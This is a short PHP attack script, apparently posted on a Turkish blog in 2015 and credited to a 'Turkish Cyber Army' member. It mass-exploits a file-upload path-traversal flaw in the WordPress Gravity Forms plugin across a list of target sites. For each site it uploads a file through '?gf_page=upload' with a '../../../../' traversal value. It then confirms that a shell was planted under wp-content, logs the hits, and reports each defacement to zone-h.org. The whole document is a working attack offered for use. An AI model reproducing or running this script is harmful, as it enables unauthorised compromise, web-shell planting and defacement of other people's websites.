<?php
/** Coded by DARKWAR2

TURKISH CYBER ARMY

TAYFA:DARKWAR2-VİRTUAL-EVLAT-MARESS-TURKHAN



 **/
$ex=file($argv[1]);
echo “nt Total site loaded : “.count($ex).”nn”;
for($i=0;$i<count($ex);$i++){
$link[$i]=strtok($ex[$i],”n”);
$zz=trim($link[$i]);
  


$post=array(“file” => “@dv.gif”,
“field_id”=>”3”,
“form_id”=>”1”,
“gform_unique_id”=>”../../../../”,
“name”=>”.gif”);
$url=”$zz/?gf_page=upload”;

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0”);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().’/cookie1.txt’);
curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().’/cookie1.txt’);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
$res = curl_exec($ch);
curl_close($ch);

                $dr2=”$zz/wp-content/_input_3_.gif”;
$gett=@file_get_contents($dr2);
if(preg_match(‘/DARKWAR2/i’,$gett)){
echo “n[+]Exploit Done n[+]shell : $dr2 nn “;
$dt = fopen(‘veri.txt’, ‘a+’);
fwrite($dt, “$dr2” . PHP_EOL);
fclose($dt);
$ch3 = curl_init (“http://www.zone-h.org/notify/single”);
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, “defacer=DARKWAR2&domain1=$dr2&hackmode=1&reason=1”);
if (preg_match (“/color=”red”>OK</font></li>/i”, curl_exec ($ch3)));


            
} else {
        echo “| “.$zz . ” : No HACK nn”;
    }
}

?>
204 Okunma 19 May 2015

Yorumlar


Sen de Yorumla!